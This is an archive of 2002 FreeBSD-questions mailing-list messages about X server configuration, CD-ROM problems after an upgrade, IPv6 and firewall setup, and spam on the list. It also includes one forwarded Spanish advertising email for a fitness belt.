Mutt/1.2.5i In-Reply-To: <20020622214152.U561-100000@66-75-1-142.san.rr.com>; from Hostmaster@Video2Video.Com on Sat, Jun 22, 2002 at 09:47:38PM -0700 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --5mCyUwZo2JvN/JJP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Sat, Jun 22, 2002 at 09:47:38PM -0700, Peter Leftwich wrote: > Remembering reading something about just settling for UNaccelerated XFree86 > use, I recently edited the ~/XF86Config.new file created by `XFree86 > -configure` and changed the line saying "ati" (driver) to "svga" (having > long-given-up on the r128 driver and replacement r128 driver I downloaded > from sourceforge.net) That produced an error in my /var/log/XFree86.0.log > file about a "Fatal error ... no screens found" or something. > > Well the x-AMAZING NEWS is that I remembered to check the contents of the > /usr/X11R6/lib/modules/drivers/ directory and, noticing no svga driver, in > seeing the vga driver ... [catches his excited breath] changed the line in > my XF86Config.new file from svga to vga and ran X! Well it worked, but a > hugely-dotted background and a huge X (movable) cursor is all I get. > What's the next step, that is, to get a normal 1024x768 resolution and > functional desktop manager? :) Yeay! I don't think you can do this with the VGA driver. According to vga(4) it won't use more than 256K of video memory, which won't get you much of a display... 1024x768x8 requires 1MB, as I recall. What was the problem with your r128 (sorry if I missed the thread earlier)? I've attached my XF86Config that works beautifully for my 8MB Rage 128 RL... this was mostly autogenerated; I think the only thing I had to do was reorder the resolutions so it comes up in 1600x1200x24 by default. HTH, Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon --5mCyUwZo2JvN/JJP Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=XF86Config Section "ServerLayout" Identifier "XFree86 Configured" Screen 0 "Screen0" 0 0 InputDevice "Mouse0" "CorePointer" InputDevice "Keyboard0" "CoreKeyboard" EndSection Section "Files" RgbPath "/usr/X11R6/lib/X11/rgb" ModulePath "/usr/X11R6/lib/modules" FontPath "/usr/X11R6/lib/X11/fonts/misc/" FontPath "/usr/X11R6/lib/X11/fonts/Speedo/" FontPath "/usr/X11R6/lib/X11/fonts/Type1/" FontPath "/usr/X11R6/lib/X11/fonts/CID/" FontPath "/usr/X11R6/lib/X11/fonts/75dpi/" FontPath "/usr/X11R6/lib/X11/fonts/100dpi/" EndSection Section "Module" Load "extmod" Load "xie" Load "pex5" Load "glx" Load "dri" Load "dbe" Load "record" EndSection Section "InputDevice" Identifier "Keyboard0" Driver "keyboard" Option "XkbModel" "pc105" Option "XkbLayout" "gb" Option "XkbOptions" "ctrl:nocaps" EndSection Section "InputDevice" Identifier "Mouse0" Driver "mouse" Option "Protocol" "Auto" Option "Device" "/dev/mouse" Option "Emulate3Buttons" EndSection Section "Monitor" Identifier "Monitor0" VendorName "MAX" ModelName "106080" HorizSync 30.0 - 110.0 VertRefresh 50.0 - 160.0 Option "DPMS" EndSection Section "Device" Identifier "Card0" Driver "ati" VendorName "ATI" BoardName "Rage 128 RL" BusID "PCI:1:5:0" EndSection Section "Screen" Identifier "Screen0" Device "Card0" Monitor "Monitor0" DefaultDepth 24 SubSection "Display" Depth 1 EndSubSection SubSection "Display" Depth 4 EndSubSection SubSection "Display" Depth 8 EndSubSection SubSection "Display" Depth 15 EndSubSection SubSection "Display" Depth 16 EndSubSection SubSection "Display" Depth 24 Modes "1600x1200" "1280x1024" "1280x960" "1152x864" "1024x768" "800x600" "640x480" EndSubSection EndSection --5mCyUwZo2JvN/JJP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 3:11:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 87B8237B42A for ; Sun, 23 Jun 2002 03:11:05 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5NAB34W004834; Sun, 23 Jun 2002 11:11:03 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5NAAwHM004833; Sun, 23 Jun 2002 11:10:58 +0100 (BST) Date: Sun, 23 Jun 2002 11:10:58 +0100 From: Matthew Seaman To: "[.lamoz]" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: my cd-rom goes mad. Message-ID: <20020623101058.GA4776@happy-idiot-talk.infracaninophi> References: <20020623121045.4a1deae1.lamoz@mailru.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020623121045.4a1deae1.lamoz@mailru.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 23, 2002 at 12:10:45PM +0400, [.lamoz] wrote: > After updatinf fbsd from 4.5R to 4.6S i can't access any file on > cd-rom. Cd-rom mounts successful, but when i'm trying to copy or > read file i gor *error message*, and it repeates until i reboot > PC. Please help me. In all newsgroups(russian ones) i didn't got any > answer. +((( http://people.freebsd.org/~bmah/relnotes/4-STABLE/errata.html Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 3:13: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cpimssmtpu03.email.msn.com (cpimssmtpu03.email.msn.com [207.46.181.79]) by hub.freebsd.org (Postfix) with ESMTP id D15F137B400 for ; Sun, 23 Jun 2002 03:12:53 -0700 (PDT) Received: from thebe ([65.57.70.170]) by cpimssmtpu03.email.msn.com with Microsoft SMTPSVC(5.0.2195.4617); Sun, 23 Jun 2002 03:11:55 -0700 From: "Aaron Burke" To: "F.Xavier Noria" Cc: "FreeBSD-Questions" Subject: RE: CDROM not working after upgrade Date: Sun, 23 Jun 2002 03:11:42 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020623115619.42430069.fxn@retemail.es> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 23 Jun 2002 10:12:00.0926 (UTC) FILETIME=[6A3BE3E0:01C21A9E] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of F.Xavier Noria > Sent: Sunday, June 23, 2002 02:56 AM > To: freebsd-questions@FreeBSD.ORG > Subject: CDROM not working after upgrade > > > After upgrading to 4.6-RELEASE the CDROM has changed from /dev/acd0c > to /dev/acd0a, and sysinstall does not find it, do you know what can > be happened? How does sysintall looks for the CDROM when selected in > the media list? Actually, they are the same device, /dev/acd0c is a block device, and /dev/acd0a is a raw device. > > -- fxn > > PS: dmesg says "acd0: CDROM at ata0-slave PIO4" > in case it is relevant. I think that your cdrom is still working. Try putting a data cd in the drive and type "mount /cdrom". Then cd to /cdrom and you should see some files. When done, type "umount /cdrom". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 3:16:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 461BA37B400 for ; Sun, 23 Jun 2002 03:16:03 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5NAG14W004893; Sun, 23 Jun 2002 11:16:01 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5NAFufP004892; Sun, 23 Jun 2002 11:15:56 +0100 (BST) Date: Sun, 23 Jun 2002 11:15:56 +0100 From: Matthew Seaman To: Matthew Seaman Cc: "[.lamoz]" , freebsd-questions@FreeBSD.ORG Subject: Re: my cd-rom goes mad. Message-ID: <20020623101556.GB4776@happy-idiot-talk.infracaninophi> References: <20020623121045.4a1deae1.lamoz@mailru.com> <20020623101058.GA4776@happy-idiot-talk.infracaninophi> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020623101058.GA4776@happy-idiot-talk.infracaninophi> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 23, 2002 at 11:10:58AM +0100, Matthew Seaman wrote: > On Sun, Jun 23, 2002 at 12:10:45PM +0400, [.lamoz] wrote: > > > After updatinf fbsd from 4.5R to 4.6S i can't access any file on > > cd-rom. Cd-rom mounts successful, but when i'm trying to copy or > > read file i gor *error message*, and it repeates until i reboot > > PC. Please help me. In all newsgroups(russian ones) i didn't got any > > answer. +((( > > http://people.freebsd.org/~bmah/relnotes/4-STABLE/errata.html Bah! Right text, wrong location. The official place is, of course: http://www.freebsd.org/releases/4.6R/errata.html Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 3:47:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.broadpark.no (217-13-4-9.dd.nextgentel.com [217.13.4.9]) by hub.freebsd.org (Postfix) with ESMTP id 0D60237B40F for ; Sun, 23 Jun 2002 03:46:34 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by mail.broadpark.no (Postfix) with ESMTP id 704A17D32 for ; Sun, 23 Jun 2002 12:46:32 +0200 (MEST) Received: from 217.13.29.51 ( [217.13.29.51]) as user johann@mail.broadpark.no by mail.broadpark.no with HTTP; Sun, 23 Jun 2002 12:46:32 +0200 Message-ID: <1024829192.3d15a70850446@mail.broadpark.no> Date: Sun, 23 Jun 2002 12:46:32 +0200 From: johann@broadpark.no To: questions@freebsd.org Subject: IPv6 on ADSL -- conflicts with onlamp.com article (IPv6, Meet FreeBSD) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1;q=1.0 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 217.13.29.51 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi. I am having some problems setting up IPv6 on my network: [1] I've added this to my g/w kernel: options IPFIREWALL # Firewall options IPFIREWALL_VERBOSE # Enable logging to syslogd(8) options IPFIREWALL_VERBOSE_LIMIT=100 # Limit verbosity options IPV6FIREWALL # Firewall for IPv6 options IPV6FIREWALL_VERBOSE options IPV6FIREWALL_VERBOSE_LIMIT=100 And this to rc.conf: firewall_enable="YES" firewall_type="OPEN" ipv6_firewall_enable="YES" ipv6_firewall_type="OPEN" Yet, I get: IPv6 packet filtering initialized, logging limited to 100 packets/entry IP packet filtering initialized, divert enabled, rule-based forwarding disabled, default to deny, logging limited to 100 packets/entry by default Note the `default to deny' -- where does that come from. After I added all these settings not even my NFS will work. [2] In O'Reilly's IPv6 article (http://www.onlamp.com/lpt/a//bsd/2002/02/22/ipv6.html) in the `Configuring Your Gateway Machine' section it describes the rtadvd configuration. On my g/w I have two interfaces; lnc0 (10.0.0.2, and this address *has* to be 10.0.0.2 for it to properly connect to my Cisco ADSL modem) and ep0 (192.168.187.2, connected to my w/s). Excactly what interfaces am I going to add to /etc/rtadvd.conf? [3] I have registered with Freenet6, and as far as I understand, tspc connects to it. Both ping6 and traceroute6 doesn't work, but I believe this is because of the rtadvd. Now, *what* is my IPv6 address? Freenet6 hasn't told me. dmesg hasn't told me. Who will? [4] Once I find out what my address is, how will I set up my subnet so it may work as my IPv4 one does? Will it be an internal subnet or an external subnet? This is all a mess. That article is meant for you guys and not me. Should it really be like that? Thanks. -- Johann To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 4:19:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ei.bzerk.org (ei.xs4all.nl [213.84.67.5]) by hub.freebsd.org (Postfix) with ESMTP id 75F6637B404 for ; Sun, 23 Jun 2002 04:19:10 -0700 (PDT) Received: from ei.bzerk.org (BOFH@localhost [127.0.0.1]) by ei.bzerk.org (8.12.3/8.12.3) with ESMTP id g5NBJOZj042843; Sun, 23 Jun 2002 13:19:29 +0200 (CEST) (envelope-from ruben@ei.bzerk.org) Received: (from ruben@localhost) by ei.bzerk.org (8.12.3/8.12.3/Submit) id g5NBJNPm042842; Sun, 23 Jun 2002 13:19:23 +0200 (CEST) Date: Sun, 23 Jun 2002 13:19:23 +0200 From: Ruben de Groot To: "Philip J. Koenig" Cc: questions@FreeBSD.ORG Subject: Re: Spam problem on the list (Was: Re: URGENT) Message-ID: <20020623131923.A42352@ei.bzerk.org> References: <20020623074218749.AAA684@empty1.ekahuna.com@pc02.ekahuna.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020623074218749.AAA684@empty1.ekahuna.com@pc02.ekahuna.com>; from pjklist@ekahuna.com on Sun, Jun 23, 2002 at 12:42:18AM -0700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 23, 2002 at 12:42:18AM -0700, Philip J. Koenig typed: > > Date: Fri, 21 Jun 2002 15:50:55 +0200 > > From: Ruben de Groot > > > > On Fri, Jun 21, 2002 at 09:12:25AM -0400, Stephen Hovey typed: > > > > > > > > > > The spam on this list is pretty phenomenal. Was it always this > > > > > bad? > > > > > > > > > > > > I don't think so. Then again, spam has gotten a lot worse everywhere > > > > over the last year or so. > > > > > > > > Then again, if questions@freebsd.org was like 95% of the email lists > > > > out there and didn't allow anyone in the whole wide world to post > > > > without being a listmember, I *guarantee* it would not be as bad as > > > > it is now. > > > > > > > > > > I think this was talked about in the past and the reasoning had something > > > to do with a problem of legit users not gettin it on their from addresses > > > in that arrangement (in other words signing up one way, but emailing from > > > another)... Personally, I think if you cant figure out that piece, you > > > should be a windows user.. > > > > > > > From /etc/motd (what every newbee will read after the first successfull > > installation): > > > > If you still have a question or problem, please take the output of > > `uname -a', along with any relevant error messages, and email it > > as a question to the questions@FreeBSD.org mailing list. > > > > I consider this an excellent service provided by FreeBSD. > > > It may be an "excellent service" to some minority of FreeBSD users, > but we all thought having open SMTP relays was an "excellent service" > too, back in the innocent years before the explosion of spam. > > Already at least one new user that I saw gave up after one day of > being on this list because of all the junk on it, and I also know > that some users in certain parts of the world consider it to be a > major problem to receive large parcels of junk - in many cases this > costs them real money due to usage costs. But you don't have to be subscribed to the list to ask a question. If your connection doesn't allow you to receive large amounts of email, junk or not, you can just submit your question without subscribing, and you will only receive answers from that thread. This is what I mean by "excellent service", it's a lot like what you get from a commercial support contract, only run entirely by volunteers who are on the lists. > > I am on at least 8 other mailing lists that allow user posting and > FreeBSD-Questions is the ONLY one that I see this problem on! > (including the other FreeBSD lists I subscribe to) I am also subscribed to several closed mailing lists, and they do have less spam sent directly to the list (although even on the freebsd-questions list this has never been more than about 5% of the total volume in my experience). On the other hand, spammers do subscibe to these mailing lists as well so as soon as I post a message to any of these lists, the email address I used will be harvested and get spammed. This amounts to the majority of spam I receive and has nothing to do with the list being open or closed. Also on these other lists I have seen members hit by virusses and spamming the list with virus-infected emails, just like recently on freebsd-questions. > > Either there should be some virus-scanning mechanism deployed > (something several of the lists I'm on do), something should be done > about moderation (ie assign several people the ability to temporarily > block traffic from certain senders) or the idea of allowing posting > from anywhere should be reconsidered. I agree on all but your last option, for reasons I gave above. The problem here I think is not what should be done, but what can be done. For example I believe the list allready is moderated (sometimes certain senders do get blocked), but as everything in FreeBSD this is a volunteers effort, and noone probably has the time to monitor the list 24x7 so the mechanism is far from watertight. If I am right and the situation can be improved by having more people monitor the list, I would be happy to spent some of my time helping out here. The other option you gave, scanning for virusses, should indeed be considered. But installing a virus-scanning mechanism on an allready heavy loaded server like hub.freebsd.org is not something you do overnight. It is highly likely that it will require a hardware upgrade just to handle the extra load from the virus scanning processes (I speak from experience here) and who is going to pay for that? > > > Phil > > > > -- > Philip J. Koenig pjklist@ekahuna.com > Electric Kahuna Systems -- Computers & Communications for the New Millenium > -- Ruben de Groot Systems & Network Manager Bzerk Internet Services -------------------------------------------- Complex problems have simple, easy to find, wrong answers. ------------------------------- Orwell ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 4:46: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from thor.sonimag.net (217-127-31-182.uc.nombres.ttd.es [217.127.31.182]) by hub.freebsd.org (Postfix) with ESMTP id 4DE2137B401 for ; Sun, 23 Jun 2002 04:40:40 -0700 (PDT) Received: from thor.sonimag.net (localhost [127.0.0.1]) by thor.sonimag.net (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id g5MLGvb25849; Sat, 22 Jun 2002 23:17:10 +0200 Received: from llca114.servidoresdns.net (llca114.servidoresdns.net [217.76.128.82]) by thor.sonimag.net (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id g5JJ4Os01668 for ; Wed, 19 Jun 2002 21:04:24 +0200 Received: from jose (217-127-31-182.uc.nombres.ttd.es [217.127.31.182]) by llca114.servidoresdns.net (8.11.0/8.10.2) with SMTP id g5JJ4kD11413 for ; Wed, 19 Jun 2002 21:04:47 +0200 Message-ID: <002601c217c3$ca7fa620$0100c0a8@jose> From: "Hispanet Technology" To: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0022_01C217D4.8D47E540" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Subject: [Publicidad] ABGYMNIC + RELOJES GENEVA X-BeenThere: publicidad@sonimag.net X-Mailman-Version: 2.0.10 List-Help: List-Post: List-Subscribe: , List-Id: Lista de Publicidad List-Unsubscribe: , List-Archive: Date: Wed, 19 Jun 2002 21:01:58 +0200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0023_01C217D4.8D47E540" ------=_NextPart_001_0023_01C217D4.8D47E540 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable WWW.OBJETS.NET KIT SPORT 2002 ABGYMNIC 2002 GIMNASIA PASIVA, 10 MINUTOS EQUIVALEN A 600 FLEXIONES DE ABDOMINALES -CENTRAL CON 6 PROGRAMAS=20 -CONTROL DE INTENSIDAD - 2 CINTURONES, UNO PARA PECTORALES Y ABDOMINALES, OTRO PARA BRAZOS Y = PIERNAS - 2 PILAS (1 DE REPUESTO) - MANUAL DE INSTRUCCIONES EN CASTELLANO - 1 A=D1O DE GARANTIA + PAREJA DE RELOJES GENEVA CON CHAPADO EN ORO, EN ESTUCHE DE LUJO PVP: 42 ? IVA INCLUIDO PORTES POR Y GASTOS DE REEMBOLSO NO INCLUIDOS EN EL PRECIO IMPORTANTE:=20 NO ACEPTE EQUIPOS SIN GARANTIA (MATERIAL DEFECTUOSO A BAJO COSTE) SOLAMENTE OBJETS.NET (HISPANET-TECHNOLOGY.COM) OFRECE GARANTIA TOTAL PEDIDOS: MANDAR E-MAIL O FAX CON LOS SIGUIENTES DATOS: -NOMBRE O RAZON SOCIAL -CIF/NIF -TELEFONO DE CONTACTO -DIRECCION Y CODIGO POSTAL TLF: 902 30 12 30 FAX: 954 27 92 02 E-MAIL: pedidos@objets.net VENTA CONTRAREEMBOLSO A TODA ESPA=D1A (SI NO QUEDA SATISFECHO, LE DEVOLVEMOS SU DINERO) Oferta valida salvo error tipogr=E1fico o fin de existencias. Si ha recibido este mensaje por error o desea que le borremos de nuestra base de datos, puede darse de baja reenviando este mensaje poniendo en = el asunto REMOVE. Este mensaje se env=EDa en concordancia con la nueva legislaci=F3n sobre = correo electr=F3nico:Por secci=F3n 301,p=E1rrafo (a)(2)(c) de S.1618 Bajo el = decreto S.1618 t=EDtulo 3ro. aprobado por el 105 congreso base de las normativas internacionales sobre SPAM, este E-mail no podr=E1 ser considerado SPAM mientras incluya una forma de ser removido.=20 ------=_NextPart_001_0023_01C217D4.8D47E540 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
WWW.OBJETS.NET=
KIT=20 SPORT 2002
 
3D"ABGYMNIC
ABGYMNIC=20 2002
GIMNASIA PASIVA,=20 10 MINUTOS EQUIVALEN A 600 FLEXIONES DE = ABDOMINALES
 
-CENTRAL CON 6 PROGRAMAS =
-CONTROL DE=20 INTENSIDAD
- 2 CINTURONES, = UNO PARA=20 PECTORALES Y ABDOMINALES, OTRO PARA BRAZOS Y = PIERNAS
- 2 PILAS (1 DE=20 REPUESTO)
- MANUAL DE = INSTRUCCIONES EN=20 CASTELLANO
-=20 1 A=D1O DE = GARANTIA
+
3D""
 
PAREJA DE = RELOJES GENEVA CON=20 CHAPADO EN ORO, EN ESTUCHE DE LUJO
PVP: 42 =80 IVA=20 INCLUIDO
PORTES = POR =20 Y GASTOS DE REEMBOLSO NO INCLUIDOS EN EL=20 PRECIO
 
IMPORTANTE:
NO=20 ACEPTE EQUIPOS SIN GARANTIA (MATERIAL DEFECTUOSO A = BAJO=20 COSTE)
SOLAMENTE OBJETS.NET=20 (HISPANET-TECHNOLOGY.COM) OFRECE GARANTIA TOTAL
 
PEDIDOS:
MANDAR E-MAIL O = FAX CON LOS=20 SIGUIENTES DATOS:
-NOMBRE O RAZON=20 SOCIAL
-CIF/NIF
-TELEFONO DE=20 CONTACTO
-DIRECCION Y = CODIGO=20 POSTAL
 
TLF: 902 30 12=20 30
FAX: 954 27 92=20 02
 

VENTA = CONTRAREEMBOLSO A TODA=20 ESPA=D1A

(SI NO QUEDA SATISFECHO, = LE=20 DEVOLVEMOS SU DINERO)

Oferta valida salvo error tipogr=E1fico o fin de = existencias.

Si ha recibido este mensaje por error o desea que le borremos de=20 nuestra
base de datos, puede darse de baja reenviando este mensaje = poniendo=20 en el asunto REMOVE.

Este mensaje se env=EDa en concordancia con la nueva legislaci=F3n = sobre=20 correo
electr=F3nico:Por secci=F3n 301,p=E1rrafo (a)(2)(c) de S.1618 = Bajo el=20 decreto
S.1618 t=EDtulo 3ro. aprobado por el 105 congreso base de las = normativas
internacionales sobre SPAM, este E-mail no podr=E1 ser = considerado=20 SPAM
mientras incluya una forma de ser removido.
=

------=_NextPart_001_0023_01C217D4.8D47E540-- ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="abgymnic1.jpg" Content-Transfer-Encoding: base64 Content-ID: <001e01c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEAlgCWAAD/7RJCUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAAlgAAAAEA AgCWAAAAAQACOEJJTQQNAAAAAAAEAAAAeDhCSU0D8wAAAAAACAAAAAAAAAAAOEJJTQQKAAAAAAAB AAA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9m ZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4 AAAAAABwAAD/////////////////////////////A+gAAAAA//////////////////////////// /wPoAAAAAP////////////////////////////8D6AAAAAD///////////////////////////// A+gAADhCSU0ECAAAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBBQAAAAAAAQAAAABOEJJTQQMAAAA ABCxAAAAAQAAAHAAAABLAAABUAAAYnAAABCVABgAAf/Y/+AAEEpGSUYAAQIBAEgASAAA/+4ADkFk b2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwMDAwRDAwMDAwM DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwM DBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgASwBwAwEiAAIRAQMRAf/dAAQAB//E AT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAAAQACAwQFBgcI CQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVSwWIzNHKC0UMH JZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSltcXV5fVWZnaG lqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFRYXEiEwUygZEU obFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOEw9N14/NGlKSF tJXE1OT0pbXF1eX1VmZ2hpamtsbW5vYnN0dXZ3eHl6e3x//aAAwDAQACEQMRAD8A5DFbbmZ7aXXO Y2x7nWWSTsraHXX2xP8Ag6WPWtXjY9wordWxtd1jKnVgH1axaw312fbd3q25NNXpXZDXt9H9PXX6 X+DqodIx7H1XbQWjLc3EF0aMZIys1/8AYqro9T/gf+MW3g5dt2W3qzA9ldGHldQx6XAEVk7+n4LW urbXvss/VX/vqxhgOHWiZcRo6+mPp/wf1iycje50pwWdOyXbWFtYvcNMd1xFsn/B7P5uu7/gLLmX f4P+cWl0z6tHJxa8vLuZh03/AMw0hz7XAyWuLLLaGV7mt9TZvfb6P6bZXWrONjPeeldOrkitrX3V lhaytzmuvdmXZD2ta63H9f8Amv0tf6v/AMN6C1a6uqFtN19uOcvHZtZZuLmyWMotdtsDP6Qymr1q basmvenjlhelnT9K6vi/q+r5f/R2PLzJjQJjG/6sOKq/75yG/VMV5+Rj5N3p0UMYRc2t+51lhc77 MK3Wem62uiuy6z0Lr/8ABV/zln6OF/1e6fRS223MIG5zLGtr3HexrH3iv9O39HjbnetZ/wCZ+leb 0vMNlpy8qp2O6ptTKGW6CLG5Flz3PYP01n6Vjbq2/oPXVjBwcl0e/Hdb6VlWS8WbaxVcX+pVit2H 0W7PQpqr/m/Sos/06I5eI1MTVnc8Pp/R/SWjmboDJG6GkYR+b9L9BwL+h+g+zGe+curdvaK3emHB 7K20mz1PU9Zzbat+z+Yttrxv+EU6ehMubZZWXQxza2sc0BznPdtpc33u9jq25D7fp+l6Vf6X9Mui p/Q47C6zFLMX1vRLby1oDHNv92+n1GXXXtqdXvZ6mVkf4NlKRttY52P6mI/c41Y59YD0afTayzZb Z6bcjHrc31K7v1b9bv8AZ61SQw4xvEnTvWsOLiv+/wCj+4uOeZ+Wt+w/S/71y/8Am651f2THtis2 lzrgz3ua1rf5lu8fSusZXXvt9P0fUtesjKr6bUA3Ezbsq/dB26UgD6TvWIZ6u7/Beh+j/wAJ6n+k 6DN687F6q6yp1FlAobUaGWGGv3vv3Mtg1vcxtv2d21llD6/8Iuf6lkYORlVPxMavChm21lJBrMH2 WBjGVtqs2+yzb/Ofo1HlxCMCYxA16n1f3o/3l+PLknOPuE6RAjQjwj+pL+7/AFXU6NiW5GJaThX5 Ze8NZbXY1pYGj9I2tltte5znPZ+k9OzYtI4zxY4noJ9IwYfdsLQRbo6719rfoM97v9Fd/wAHszun XdHrwa2ZGdmU3Q5z6qC8Vtc4u+htqd7nMZTv/Se//SKXUM3p5xnDBzs2257tpruss2+kR+lDpYxl m53t2rFyDNPNKIExEy4b4eZjCvl4uOGbHD/Eb4qmx1I14mMfV6SzHfYCyu37Q2w7vc3f6Nb7PobH s/4z/hVyz7LhY2Humedx+Hirt2Tfa0NtufY1pLgHvc4BzvpuaHH6T/zlnWEeoNRyO6uYMRxxIkbk 